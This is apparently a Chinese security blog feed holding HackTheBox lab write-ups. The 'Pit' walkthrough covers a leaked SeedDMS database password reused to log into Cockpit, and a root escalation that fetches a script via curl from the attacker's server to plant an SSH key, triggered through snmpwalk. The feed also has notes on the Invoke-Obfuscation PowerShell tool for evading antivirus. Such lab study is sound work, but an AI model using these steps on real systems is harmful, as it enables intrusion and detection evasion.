class="attr">maxSizeForFullText</span>=<span class="string">&quot;0&quot;</span> <span class="attr">showSingleSearchHit</span>=<span class="string">&quot;false&quot;</span> <span class="attr">enableSessionList</span>=<span class="string">&quot;false&quot;</span> <span class="attr">enableDropFolderList</span>=<span class="string">&quot;false&quot;</span> <span class="attr">enableMultiUpload</span>=<span class="string">&quot;false&quot;</span> <span class="attr">defaultDocPosition</span>=<span class="string">&quot;end&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">edition</span>&gt;</span> </span><br><span class="line">    <span class="comment">&lt;!-- enableCalendar: enable/disable calendar</span></span><br><span class="line"><span class="comment">       - calendarDefaultView: calendar default view (&quot;w&quot; for week,&quot;m&quot; for month,&quot;y&quot; for year)</span></span><br><span class="line"><span class="comment">       - firstDayOfWeek: first day of the week (0=sunday, 6=saturday)</span></span><br><span class="line"><span class="comment">    --&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">calendar</span> <span class="attr">enableCalendar</span>=<span class="string">&quot;true&quot;</span> <span class="attr">calendarDefaultView</span>=<span class="string">&quot;y&quot;</span> <span class="attr">firstDayOfWeek</span>=<span class="string">&quot;0&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">calendar</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">webdav</span> <span class="attr">enableWebdavReplaceDoc</span>=<span class="string">&quot;true&quot;</span>/&gt;</span><span class="tag">&lt;/<span class="name">site</span>&gt;</span></span><br><span class="line">  </span><br><span class="line">  <span class="tag">&lt;<span class="name">system</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- rootDir: Path to where SeedDMS is located</span></span><br><span class="line"><span class="comment">       - httpRoot: The relative path in the URL, after the domain part. Do not include the</span></span><br><span class="line"><span class="comment">       -           http:// prefix or the web host name. e.g. If the full URL is</span></span><br><span class="line"><span class="comment">	     -           http://www.example.com/seeddms/, set $_httpRoot = &quot;/seeddms/&quot;.</span></span><br><span class="line"><span class="comment">	     -           If the URL is http://www.example.com/, set $_httpRoot = &quot;/&quot;.</span></span><br><span class="line"><span class="comment">       - contentDir: Where the uploaded files are stored (best to choose a directory that</span></span><br><span class="line"><span class="comment">       -             is not accessible through your web-server)</span></span><br><span class="line"><span class="comment">       - stagingDir: Where partial file uploads are saved</span></span><br><span class="line"><span class="comment">       - luceneDir: Where the lucene fulltext index iѕ saved</span></span><br><span class="line"><span class="comment">       - logFileEnable: set false to disable log system</span></span><br><span class="line"><span class="comment">       - logFileRotation: the log file rotation (h=hourly, d=daily, m=monthly)</span></span><br><span class="line"><span class="comment">       - enableLargeFileUpload: support for jumploader</span></span><br><span class="line"><span class="comment">       - partitionsize: size of chunk uploaded by jumploader</span></span><br><span class="line"><span class="comment">       - dropFolderDir: where files for document upload are located</span></span><br><span class="line"><span class="comment">       - cacheDir: where the preview images are saved</span></span><br><span class="line"><span class="comment">    --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">server</span> <span class="attr">rootDir</span>=<span class="string">&quot;/var/www/html/seeddms51x/seeddms/&quot;</span> <span class="attr">httpRoot</span>=<span class="string">&quot;/seeddms51x/seeddms/&quot;</span> <span class="attr">contentDir</span>=<span class="string">&quot;/var/www/html/seeddms51x/data/&quot;</span> <span class="attr">stagingDir</span>=<span class="string">&quot;/var/www/html/seeddms51x/data/staging/&quot;</span> <span class="attr">luceneDir</span>=<span class="string">&quot;/var/www/html/seeddms51x/data/lucene/&quot;</span> <span class="attr">logFileEnable</span>=<span class="string">&quot;true&quot;</span> <span class="attr">logFileRotation</span>=<span class="string">&quot;d&quot;</span> <span class="attr">enableLargeFileUpload</span>=<span class="string">&quot;false&quot;</span> <span class="attr">partitionSize</span>=<span class="string">&quot;2000000&quot;</span> <span class="attr">cacheDir</span>=<span class="string">&quot;/var/www/html/seeddms51x/data/cache/&quot;</span> <span class="attr">dropFolderDir</span>=<span class="string">&quot;&quot;</span> <span class="attr">backupDir</span>=<span class="string">&quot;&quot;</span> <span class="attr">repositoryUrl</span>=<span class="string">&quot;&quot;</span> <span class="attr">maxUploadSize</span>=<span class="string">&quot;&quot;</span> <span class="attr">enableXsendfile</span>=<span class="string">&quot;false&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">server</span>&gt;</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">&lt;!-- enableGuestLogin: If you want anybody to login as guest, set the following line to true</span></span><br><span class="line"><span class="comment">       -                   <span class="doctag">note:</span> guest login should be used only in a trusted environment</span></span><br><span class="line"><span class="comment">			 - enablePasswordForgotten: Allow users to reset their password</span></span><br><span class="line"><span class="comment">       - restricted: Restricted access: only allow users to log in if they have an entry in the local database (irrespective of successful authentication with LDAP).</span></span><br><span class="line"><span class="comment">       - enableUserImage: enable users images</span></span><br><span class="line"><span class="comment">       - disableSelfEdit: if true user cannot edit his own profile</span></span><br><span class="line"><span class="comment">			 - passwordStrength: minimum strength of password, set to 0 to disable</span></span><br><span class="line"><span class="comment">			 - passwordExpiration: number of days after password expires</span></span><br><span class="line"><span class="comment">			 - passwordHistory: number of remembered passwords</span></span><br><span class="line"><span class="comment">			 - passwordStrengthAlgorithm: algorithm used to calculate password strenght (simple or advanced)</span></span><br><span class="line"><span class="comment">			 - encryptionKey: arbitrary string used for creating identifiers</span></span><br><span class="line"><span class="comment">    --&gt;</span>    </span><br><span class="line">    <span class="tag">&lt;<span class="name">authentication</span> <span class="attr">enableGuestLogin</span>=<span class="string">&quot;false&quot;</span> <span class="attr">enablePasswordForgotten</span>=<span class="string">&quot;false&quot;</span> <span class="attr">restricted</span>=<span class="string">&quot;true&quot;</span> <span class="attr">enableUserImage</span>=<span class="string">&quot;false&quot;</span> <span class="attr">disableSelfEdit</span>=<span class="string">&quot;false&quot;</span> <span class="attr">passwordStrength</span>=<span class="string">&quot;0&quot;</span> <span class="attr">passwordStrengthAlgorithm</span>=<span class="string">&quot;simple&quot;</span> <span class="attr">passwordExpiration</span>=<span class="string">&quot;10&quot;</span> <span class="attr">passwordHistory</span>=<span class="string">&quot;0&quot;</span> <span class="attr">loginFailure</span>=<span class="string">&quot;0&quot;</span> <span class="attr">autoLoginUser</span>=<span class="string">&quot;0&quot;</span> <span class="attr">quota</span>=<span class="string">&quot;0&quot;</span> <span class="attr">undelUserIds</span>=<span class="string">&quot;&quot;</span> <span class="attr">encryptionKey</span>=<span class="string">&quot;cfecb42d13f2e1666cddde56991a2cbf&quot;</span> <span class="attr">cookieLifetime</span>=<span class="string">&quot;0&quot;</span> <span class="attr">enableGuestAutoLogin</span>=<span class="string">&quot;false&quot;</span> <span class="attr">defaultAccessDocs</span>=<span class="string">&quot;0&quot;</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">connectors</span>&gt;</span></span><br><span class="line">        <span class="comment">&lt;!-- ***** CONNECTOR LDAP  *****</span></span><br><span class="line"><span class="comment">           - enable: enable/disable connector</span></span><br><span class="line"><span class="comment">           - type: type of connector ldap / AD</span></span><br><span class="line"><span class="comment">           - host: hostname of the authentification server</span></span><br><span class="line"><span class="comment">           -       URIs are supported, e.g.: ldaps://ldap.host.com</span></span><br><span class="line"><span class="comment">           - port: port of the authentification server</span></span><br><span class="line"><span class="comment">           - baseDN: top level of the LDAP directory tree</span></span><br><span class="line"><span class="comment">        --&gt;</span>  </span><br><span class="line">        <span class="tag">&lt;<span class="name">connector</span> <span class="attr">enable</span>=<span class="string">&quot;false&quot;</span> <span class="attr">type</span>=<span class="string">&quot;ldap&quot;</span> <span class="attr">host</span>=<span class="string">&quot;ldaps://ldap.host.com&quot;</span> <span class="attr">port</span>=<span class="string">&quot;389&quot;</span> <span class="attr">baseDN</span>=<span class="string">&quot;&quot;</span> <span class="attr">bindDN</span>=<span class="string">&quot;&quot;</span> <span class="attr">bindPw</span>=<span class="string">&quot;&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">connector</span>&gt;</span></span><br><span class="line">        <span class="comment">&lt;!-- ***** CONNECTOR Microsoft Active Directory  *****</span></span><br><span class="line"><span class="comment">           - enable: enable/disable connector</span></span><br><span class="line"><span class="comment">           - type: type of connector ldap / AD</span></span><br><span class="line"><span class="comment">           - host: hostname of the authentification server</span></span><br><span class="line"><span class="comment">           - port: port of the authentification server</span></span><br><span class="line"><span class="comment">           - baseDN: top level of the LDAP directory tree</span></span><br><span class="line"><span class="comment">           - accountDomainName: sample: example.com</span></span><br><span class="line"><span class="comment">        --&gt;</span>  </span><br><span class="line">        <span class="tag">&lt;<span class="name">connector</span> <span class="attr">enable</span>=<span class="string">&quot;false&quot;</span> <span class="attr">type</span>=<span class="string">&quot;AD&quot;</span> <span class="attr">host</span>=<span class="string">&quot;ldap.example.com&quot;</span> <span class="attr">port</span>=<span class="string">&quot;389&quot;</span> <span class="attr">baseDN</span>=<span class="string">&quot;&quot;</span> <span class="attr">accountDomainName</span>=<span class="string">&quot;example.com&quot;</span> <span class="attr">bindDN</span>=<span class="string">&quot;&quot;</span> <span class="attr">bindPw</span>=<span class="string">&quot;&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">connector</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;/<span class="name">connectors</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">authentication</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!--</span></span><br><span class="line"><span class="comment">       - dbDriver: DB-Driver used by adodb (see adodb-readme)</span></span><br><span class="line"><span class="comment">       - dbHostname: DB-Server</span></span><br><span class="line"><span class="comment">       - dbDatabase: database where the tables for seeddms are stored (optional - see adodb-readme)</span></span><br><span class="line"><span class="comment">       - dbUser: username for database-access</span></span><br><span class="line"><span class="comment">       - dbPass: password for database-access</span></span><br><span class="line"><span class="comment">    --&gt;</span>    </span><br><span class="line">    <span class="tag">&lt;<span class="name">database</span> <span class="attr">dbDriver</span>=<span class="string">&quot;mysql&quot;</span> <span class="attr">dbHostname</span>=<span class="string">&quot;localhost&quot;</span> <span class="attr">dbDatabase</span>=<span class="string">&quot;seeddms&quot;</span> <span class="attr">dbUser</span>=<span class="string">&quot;seeddms&quot;</span> <span class="attr">dbPass</span>=<span class="string">&quot;ied^ieY6xoquu&quot;</span> <span class="attr">doNotCheckVersion</span>=<span class="string">&quot;false&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">database</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- smtpServer: SMTP Server hostname</span></span><br><span class="line"><span class="comment">       - smtpPort: SMTP Server port</span></span><br><span class="line"><span class="comment">       - smtpSendFrom: Send from</span></span><br><span class="line"><span class="comment">    --&gt;</span>    </span><br><span class="line">    <span class="tag">&lt;<span class="name">smtp</span> <span class="attr">smtpServer</span>=<span class="string">&quot;localhost&quot;</span> <span class="attr">smtpPort</span>=<span class="string">&quot;25&quot;</span> <span class="attr">smtpSendFrom</span>=<span class="string">&quot;seeddms@localhost&quot;</span> <span class="attr">smtpUser</span>=<span class="string">&quot;&quot;</span> <span class="attr">smtpPassword</span>=<span class="string">&quot;&quot;</span>/&gt;</span>    </span><br><span class="line">  <span class="tag">&lt;/<span class="name">system</span>&gt;</span></span><br><span class="line"> </span><br><span class="line">  </span><br><span class="line">  <span class="tag">&lt;<span class="name">advanced</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- siteDefaultPage: Default page on login. Defaults to out/out.ViewFolder.php</span></span><br><span class="line"><span class="comment">       - rootFolderID: ID of root-folder (mostly no need to change)</span></span><br><span class="line"><span class="comment">       - titleDisplay<span class="doctag">Hack:</span> Workaround for page titles that go over more than 2 lines.</span></span><br><span class="line"><span class="comment">    --&gt;</span>  </span><br><span class="line">    <span class="tag">&lt;<span class="name">display</span> <span class="attr">siteDefaultPage</span>=<span class="string">&quot;&quot;</span> <span class="attr">rootFolderID</span>=<span class="string">&quot;1&quot;</span> <span class="attr">titleDisplayHack</span>=<span class="string">&quot;true&quot;</span> <span class="attr">showMissingTranslations</span>=<span class="string">&quot;false&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">display</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- guestID: ID of guest-user used when logged in as guest (mostly no need to change)</span></span><br><span class="line"><span class="comment">       - adminIP: if enabled admin can login only by specified IP addres, leave empty to avoid the control</span></span><br><span class="line"><span class="comment">       -          <span class="doctag">NOTE:</span> works only with local autentication (no LDAP)</span></span><br><span class="line"><span class="comment">    --&gt;</span> </span><br><span class="line">    <span class="tag">&lt;<span class="name">authentication</span> <span class="attr">guestID</span>=<span class="string">&quot;2&quot;</span> <span class="attr">adminIP</span>=<span class="string">&quot;&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">authentication</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- enableAdminRevApp: false to don&#x27;t list administrator as reviewer/approver</span></span><br><span class="line"><span class="comment">       - versioningFileName: the name of the versioning info file created by the backup tool</span></span><br><span class="line"><span class="comment">       - workflowMode: &#x27;traditional&#x27; or &#x27;advanced&#x27;</span></span><br><span class="line"><span class="comment">       - enableVersionDeletion: allow to delete versions after approval</span></span><br><span class="line"><span class="comment">       - enableVersionModification: allow to modify versions after approval</span></span><br><span class="line"><span class="comment">       - enableDuplicateDocNames: allow duplicate names in a folder</span></span><br><span class="line"><span class="comment">    --&gt;</span> </span><br><span class="line">    <span class="tag">&lt;<span class="name">edition</span> <span class="attr">enableAdminRevApp</span>=<span class="string">&quot;false&quot;</span> <span class="attr">versioningFileName</span>=<span class="string">&quot;versioning_info.txt&quot;</span> <span class="attr">workflowMode</span>=<span class="string">&quot;traditional&quot;</span> <span class="attr">enableVersionDeletion</span>=<span class="string">&quot;true&quot;</span> <span class="attr">enableVersionModification</span>=<span class="string">&quot;true&quot;</span> <span class="attr">enableDuplicateDocNames</span>=<span class="string">&quot;true&quot;</span> <span class="attr">enableOwnerRevApp</span>=<span class="string">&quot;false&quot;</span> <span class="attr">enableSelfRevApp</span>=<span class="string">&quot;false&quot;</span> <span class="attr">presetExpirationDate</span>=<span class="string">&quot;&quot;</span> <span class="attr">overrideMimeType</span>=<span class="string">&quot;false&quot;</span> <span class="attr">initialDocumentStatus</span>=<span class="string">&quot;0&quot;</span> <span class="attr">enableAcknowledgeWorkflow</span>=<span class="string">&quot;&quot;</span> <span class="attr">enableRevisionWorkflow</span>=<span class="string">&quot;&quot;</span> <span class="attr">advancedAcl</span>=<span class="string">&quot;false&quot;</span> <span class="attr">enableUpdateRevApp</span>=<span class="string">&quot;false&quot;</span> <span class="attr">removeFromDropFolder</span>=<span class="string">&quot;false&quot;</span> <span class="attr">allowReviewerOnly</span>=<span class="string">&quot;false&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">edition</span>&gt;</span></span><br><span class="line">		<span class="comment">&lt;!-- enableNotificationAppRev: true to send notifation if a user is added as a reviewer or approver</span></span><br><span class="line"><span class="comment">		--&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">notification</span> <span class="attr">enableNotificationAppRev</span>=<span class="string">&quot;true&quot;</span> <span class="attr">enableOwnerNotification</span>=<span class="string">&quot;false&quot;</span> <span class="attr">enableNotificationWorkflow</span>=<span class="string">&quot;false&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">notification</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- coreDir: Path to SeedDMS_Core (optional)</span></span><br><span class="line"><span class="comment">       - luceneClassDir: Path to SeedDMS_Lucene (optional)</span></span><br><span class="line"><span class="comment">       - contentOffsetDir: To work around limitations in the underlying file system, a new </span></span><br><span class="line"><span class="comment">       -                   directory structure has been devised that exists within the content </span></span><br><span class="line"><span class="comment">       -                   directory ($_contentDir). This requires a base directory from which </span></span><br><span class="line"><span class="comment">       -                   to begin. Usually leave this to the default setting, 1048576, but can </span></span><br><span class="line"><span class="comment">       -                   be any number or string that does not already exist within $_contentDir.	</span></span><br><span class="line"><span class="comment">       - maxDirID: Maximum number of sub-directories per parent directory. Default: 0, use 31998 (maximum number of dirs in ext3) for a multi level content directory.</span></span><br><span class="line"><span class="comment">       - updateNotifyTime: users are notified about document-changes that took place within the last &quot;updateNotifyTime&quot; seconds</span></span><br><span class="line"><span class="comment">       - extraPath: Path to addtional software. This is the directory containing additional software like the adodb directory, or the pear Log package. This path will be added to the php include path</span></span><br><span class="line"><span class="comment">    --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">server</span> <span class="attr">coreDir</span>=<span class="string">&quot;&quot;</span> <span class="attr">luceneClassDir</span>=<span class="string">&quot;&quot;</span> <span class="attr">contentOffsetDir</span>=<span class="string">&quot;1048576&quot;</span> <span class="attr">maxDirID</span>=<span class="string">&quot;0&quot;</span> <span class="attr">updateNotifyTime</span>=<span class="string">&quot;86400&quot;</span> <span class="attr">extraPath</span>=<span class="string">&quot;/var/www/html/seeddms51x/pear/&quot;</span> <span class="attr">maxExecutionTime</span>=<span class="string">&quot;30&quot;</span> <span class="attr">cmdTimeout</span>=<span class="string">&quot;10&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">server</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">converters</span> <span class="attr">target</span>=<span class="string">&quot;fulltext&quot;</span>&gt;</span></span><br><span class="line">		 <span class="tag">&lt;<span class="name">converter</span> <span class="attr">mimeType</span>=<span class="string">&quot;application/pdf&quot;</span>&gt;</span>pdftotext -nopgbrk %s - | sed -e &#x27;s/ [a-zA-Z0-9.]\&#123;1\&#125; / /g&#x27; -e &#x27;s/[0-9.]//g&#x27;<span class="tag">&lt;/<span class="name">converter</span>&gt;</span></span><br><span class="line">     <span class="tag">&lt;<span class="name">converter</span> <span class="attr">mimeType</span>=<span class="string">&quot;application/msword&quot;</span>&gt;</span>catdoc %s<span class="tag">&lt;/<span class="name">converter</span>&gt;</span></span><br><span class="line">     <span class="tag">&lt;<span class="name">converter</span> <span class="attr">mimeType</span>=<span class="string">&quot;application/vnd.ms-excel&quot;</span>&gt;</span>ssconvert -T Gnumeric_stf:stf_csv -S %s fd://1<span class="tag">&lt;/<span class="name">converter</span>&gt;</span></span><br><span class="line">     <span class="tag">&lt;<span class="name">converter</span> <span class="attr">mimeType</span>=<span class="string">&quot;audio/mp3&quot;</span>&gt;</span>id3 -l -R %s | egrep &#x27;(Title|Artist|Album)&#x27; | sed &#x27;s/^[^:]*: //g&#x27;<span class="tag">&lt;/<span class="name">converter</span>&gt;</span></span><br><span class="line">     <span class="tag">&lt;<span class="name">converter</span> <span class="attr">mimeType</span>=<span class="string">&quot;audio/mpeg&quot;</span>&gt;</span>id3 -l -R %s | egrep &#x27;(Title|Artist|Album)&#x27; | sed &#x27;s/^[^:]*: //g&#x27;<span class="tag">&lt;/<span class="name">converter</span>&gt;</span></span><br><span class="line">     <span class="tag">&lt;<span class="name">converter</span> <span class="attr">mimeType</span>=<span class="string">&quot;text/plain&quot;</span>&gt;</span>cat %s<span class="tag">&lt;/<span class="name">converter</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">converters</span>&gt;</span></span><br><span class="line"></span><br><span class="line">  <span class="tag">&lt;/<span class="name">advanced</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">extensions</span>&gt;</span><span class="tag">&lt;<span class="name">extension</span> <span class="attr">name</span>=<span class="string">&quot;example&quot;</span>/&gt;</span><span class="tag">&lt;/<span class="name">extensions</span>&gt;</span><span class="tag">&lt;/<span class="name">configuration</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">pre</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>其中发现了数据库的账号密码</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">database</span> <span class="attr">dbDriver</span>=<span class="string">&quot;mysql&quot;</span> <span class="attr">dbHostname</span>=<span class="string">&quot;localhost&quot;</span> <span class="attr">dbDatabase</span>=<span class="string">&quot;seeddms&quot;</span> <span class="attr">dbUser</span>=<span class="string">&quot;seeddms&quot;</span> <span class="attr">dbPass</span>=<span class="string">&quot;ied^ieY6xoquu&quot;</span> <span class="attr">doNotCheckVersion</span>=<span class="string">&quot;false&quot;</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>但是<code>/etc/passwd</code>中mysql为<code>/sbin/nologin</code>，解释如下：</p>
<blockquote>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">If  the file /etc/nologin exists and is readable, login(1) will allow access only to root.</span><br><span class="line">Other users will be shown the contents of this file and  their  logins  will  be  refused.</span><br><span class="line">This provides a simple way of temporarily disabling all unprivileged logins.</span><br></pre></td></tr></table></figure>
</blockquote>
<p>就是禁止以账户的的方式登录，通常由许多需要账户但不想通过授予登陆访问权限而造成安全问题的系统服务器使用，那这里没法通过<strong>远程命令执行</strong>用数据库账号密码来查询数据了</p>
<p>上面我们已经知道9090端口可以登录Cockpit，且<strong>root</strong>和<strong>michelle</strong>两个用户使用<code>/bin/bash</code>，结合Cockpit控制台的作用，我们尝试用<code>username:michelle/password:ied^ieY6xoquu</code>登录cockpit，成功登录！</p>
<p>在<strong>Accounts</strong>中，发现确实存在<strong>root</strong>和<strong>michelle</strong>两个用户</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/Pit_usertxt.png" alt="usertxt"></p>
<p>用Cockpit自带的终端找到user.txt</p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>先用<code>sudo -l</code>列出目前用户可执行与无法执行的指令，发现<strong>michelle</strong>用户不能执行<code>sudo</code>命令，另寻他法</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/pit_sudo-l.png" alt="sudo-l"></p>
<p>回到snmp文件，发现<code>/usr/bin/monitor</code>,monitor是一个文件，用<code>cat</code>命令看看写了啥</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E6%B3%84%E9%9C%B2%E4%BF%A1%E6%81%AF3.png" alt="泄露信息3"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/monitor.png" alt="monitor"></p>
<p>进入<code>/usr/local/monitoring</code>目录，可以看但我们只有<code>wx</code>权限。向目录写入一个脚本文件，<code>cat</code>以后成功输出了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/%E4%B8%8D%E5%8F%AF%E6%89%A7%E8%A1%8C.png" alt="不可执行"></p>
<p>结合在<strong>Accounts</strong>中的发现，我们可以向<code>/root/.ssh</code>写入一个密钥来绕过SSH密码登录root账户</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/hint2.png" alt="hint2"></p>
<p>在本地生成一对密钥，会产生<strong>xxx.pub</strong>和<strong>xxx</strong>两个文件</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/createkey.png" alt="createkey"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/publickey.png" alt="publickey"></p>
<p>写一个shell脚本来写入我们的密钥</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/checkme.png" alt="checkme"></p>
<p>在本地一起个web服务<code>python -m http.server 80</code>，并在Cockpit终端中用<code>curl</code>命令来获取本地的shell脚本，用<code>cat</code>执行脚本</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/writekey.png" alt="writekey"></p>
<p>用snmpwalk加载所有内容</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects#-m MIB[:...]          load given list of MIBs (ALL loads everything)</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/snmpcommand.png" alt="snmpcommand"></p>
<p>接下来就可以用配对的密钥SSH连接root了，得到root.txt</p>
<p>![ssh root](<a href="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/ssh">https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/ssh</a> root.png)</p>
<p>写入密钥并连接的操作需要连贯的完成，因为目标Linux会定时删除<code>/monitoring</code>目录下的文件</p>
<p><strong>注意！！运行snmpwalk前需要安装配置好snmp</strong></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">apt-get install snmpcpan -i NetAddr::IPapt-get install snmp-mibs-downloadersudo download-mibs</span><br></pre></td></tr></table></figure>

<h2 id="写在最后"><a href="#写在最后" class="headerlink" title="写在最后"></a>写在最后</h2><p>总的做下来是学到了新知识的，以后信息收集的时候也会注意更多小细节</p>
<p>在SeedDMS版本漏洞利用的点上是官方设计的问题，有文章没解释就说这里应该用<strong>CVE-2019-12744的漏洞</strong>我觉得这是非常不负责任的一件事情，我们应该抱着质疑的态度而不是文章怎么写就照着做</p>
<p>安全客转载链接：<a href="https://www.anquanke.com/post/id/248891">https://www.anquanke.com/post/id/248891</a></p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://www.poftut.com/snmpwalk-command-line-examples/">https://www.poftut.com/snmpwalk-command-line-examples/</a></p>
<p><a href="https://blog.csdn.net/dongwuming/article/details/9705595">https://blog.csdn.net/dongwuming/article/details/9705595</a></p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>HackTheBox</tag>
      </tags>
  </entry>
  <entry>
    <title>Invoke-Obfuscation工具小记</title>
    <url>/2022/02/22/Invoke-Obfuscation%E5%B7%A5%E5%85%B7%E5%B0%8F%E8%AE%B0/</url>
    <content><![CDATA[<h1 id="Powershell命令和脚本混淆器Invoke-Obfuscation"><a href="#Powershell命令和脚本混淆器Invoke-Obfuscation" class="headerlink" title="Powershell命令和脚本混淆器Invoke-Obfuscation"></a>Powershell命令和脚本混淆器Invoke-Obfuscation</h1><p>下载地址：<a href="https://github.com/danielbohannon/Invoke-Obfuscation">https://github.com/danielbohannon/Invoke-Obfuscation</a></p>
<span id="more"></span>

<h2 id="安装报错解决"><a href="#安装报错解决" class="headerlink" title="安装报错解决"></a>安装报错解决</h2><p>在安装该框架的时候碰到了点问题，基本上报的错误是下面这个</p>
<blockquote>
<p>Import-Module.\Invoke-Obfuscation.psd1 : 无法将“Import-Module.\Invoke-Obfuscation.psd1”项识别为 cmdlet、函数、脚本文 件或可运行程序的名称。请检查名称的拼写，如果包括路径，请确保路径正确，然后再试一次</p>
</blockquote>
<p><strong>解决方法</strong></p>
<p>直接用管理员身份运行Powershell (实测从管理员身份的cmd转powshell没用)</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Set-ExecutionPolicy Unrestricted</span><br><span class="line">Import-Module ./Invoke-Obfuscation.psd1</span><br><span class="line">Invoke-Obfuscation</span><br></pre></td></tr></table></figure>

<p>问题解决</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20211109154703264.png" alt="image-20211109154703264"></p>
<h2 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>使用方法</h2><blockquote>
<p>1、设置要混淆的ps1文件</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">set scriptpath 路径     //直接加ps1文件路径 例如：E:\...\payload.ps1</span><br><span class="line">或</span><br><span class="line">set scriptblock &quot;xxx&quot;     //xxx为powershell命令</span><br></pre></td></tr></table></figure>

<p>2、加密</p>
<p>encoding选择加密方式</p>
<p>3、输出文件</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">out [路径\文件名]   //例如：E:\\...\1.ps1</span><br></pre></td></tr></table></figure>

<p>*4、选择命令的启动方式</p>
<p>加密后back返回上级</p>
<p>launcher选择命令的启动方式</p>
</blockquote>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p>1、<a href="https://www.cnblogs.com/mrhonest/p/13425804.html">https://www.cnblogs.com/mrhonest/p/13425804.html</a></p>
<p>2、<a href="https://zhuanlan.zhihu.com/p/377121742%EF%BC%88%E5%A5%BD%E6%96%87%EF%BC%81%EF%BC%81%EF%BC%81%EF%BC%89">https://zhuanlan.zhihu.com/p/377121742（好文！！！）</a></p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>工具</tag>
        <tag>免杀</tag>
      </tags>
  </entry>
  <entry>
    <title>HackTheBox-theNotebook</title>
    <url>/2022/01/07/HackTheBox-theNotebook/</url>
    <content><![CDATA[<h1 id="Hackthebox-theNotebook"><a href="#Hackthebox-theNotebook" class="headerlink" title="Hackthebox-theNotebook"></a>Hackthebox-theNotebook</h1><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/TNB_pwned.png" alt="pwned"></p>
<span id="more"></span>

<blockquote>
<p>本机IP：10.10.16.11</p>
<p>目标IP：10.10.10.230</p>
</blockquote>
<h2 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h2><p>1.jwt令牌伪造</p>
<p>2.CVE-2019-5736 docker容器逃逸</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p><strong>nmap</strong></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/TNB_nmap.png" alt="nmap"></p>
<p>还是熟悉的22和80端口，访问下网站</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/notebook.png" alt="notebook"></p>
<p>测试了一下，登录和注册界面应该不存在sql注入</p>
